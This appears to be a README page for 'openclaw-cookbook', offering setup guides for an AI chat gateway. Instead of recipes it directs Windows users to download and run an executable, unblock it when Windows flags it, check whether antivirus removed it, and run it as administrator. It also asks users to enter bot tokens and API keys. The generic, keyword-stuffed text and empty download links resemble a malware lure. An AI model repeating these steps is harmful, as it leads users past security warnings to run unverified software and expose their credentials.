openclaw-cookbook gives you ready-made setup guides for OpenClaw, a self-hosted AI agent gateway for chat apps. It helps you connect tools like Telegram, Discord, Slack, and WhatsApp with one setup.
Use it when you want:
- one place to manage AI chats
- support for more than one channel
- a setup that runs on your own machine or server
- multi-model AI access
- long-term memory for agents
- clear steps you can follow without coding
Before you start, check that your PC has:
- Windows 10 or Windows 11
- at least 8 GB of RAM
- 2 GB of free disk space
- a stable internet connection
- permission to install software
- a modern browser like Chrome, Edge, or Firefox
For best results, use a machine with 16 GB of RAM if you plan to run more than one agent or model.
Use this link to visit the page and download the package:
After you open the page:
- Find the latest release or main download area.
- Download the file for Windows if one is listed.
- If the download is a ZIP file, save it to your Downloads folder.
- If the download is an installer, save the installer to your PC.
- If your browser asks for permission, choose Keep or Save.
If you downloaded a ZIP file:
- Open the ZIP file.
- Click Extract All.
- Pick a folder you can find later, such as Desktop or Documents.
- Open the extracted folder.
- Look for a file such as
setup.exe,install.exe, oropenclaw-cookbook.exe. - Double-click the file to start it.
If you downloaded an installer:
- Double-click the installer.
- Choose Yes if Windows asks for permission.
- Follow the setup steps on screen.
- Keep the default options unless the guide tells you to change them.
- Finish the setup and open the app from the desktop or Start menu.
When the app opens for the first time, you may need to enter a few details.
Common setup items include:
- your OpenClaw gateway address
- your bot token for Telegram, Discord, Slack, or WhatsApp
- your model provider key
- a name for your agent
- a memory store location
Use the values from your OpenClaw setup or your hosting panel. If you are not sure what to enter, check the recipe that matches your channel.
This cookbook helps you build common OpenClaw setups such as:
- a Telegram bot that answers messages
- a Discord agent for team chat
- a Slack helper for work channels
- a WhatsApp assistant for personal use
- a multi-agent workflow with task routing
- a memory-backed assistant that keeps context over time
- a model switch setup for different AI tasks
Each recipe is made to be followed in order.
- Pick the channel you want to use.
- Open the matching guide.
- Copy the values shown in the recipe.
- Paste them into the setup screen or config file.
- Save your changes.
- Start the app.
- Send a test message from Telegram, Discord, Slack, or WhatsApp.
If the recipe includes a sample config, use it as a base and change only the values that match your account.
Some setups need access keys or bot tokens. These are normal for chat tools and AI models.
Keep these items ready:
- Telegram bot token
- Discord bot token
- Slack app token
- WhatsApp connection details
- model API key
- OpenClaw gateway URL
- memory database path
Store these values in a safe place. Do not share them in chat logs or public posts.
After setup, test with a short message like:
- Hello
- What can you do?
- Show me a quick reply
A working setup should:
- open without errors
- connect to the chosen chat channel
- send and receive messages
- keep the same settings after restart
- remember past context if memory is on
If something does not work, check the token, server address, and channel settings first.
When you extract the files, this layout can help:
openclaw-cookbook/- main folderrecipes/- setup guidesexamples/- sample config filesassets/- images or screenshotslogs/- app logs if the app creates them
Keep the folder in one place so you can find it again after a restart.
If Windows blocks the file:
- Right-click the file.
- Choose Properties.
- If you see an Unblock box, check it.
- Click Apply.
- Try again.
If the app does not open:
- Make sure the download finished.
- Confirm you extracted the ZIP file.
- Check that your antivirus did not remove the file.
- Run the app as administrator.
- Try a fresh download from the link above.
If the channel does not connect:
- Check the bot token.
- Check the gateway URL.
- Make sure the bot is enabled in the app or host panel.
- Restart the app and test again.
This project fits these areas:
- AI agent setup
- AI gateway workflows
- chatbot guides
- cookbook-style instructions
- LLM connections
- multi-agent support
- self-hosted deployment
- Telegram bot setup
- step-by-step tutorials
If you need the files again, use the same page:
Visit the OpenClaw Cookbook download page
Telegram works well for quick personal use.
Discord works well for groups and communities.
Slack fits office and team chat.
WhatsApp fits mobile-first use.
Choose the channel that matches where you already talk with people, then follow the recipe for that channel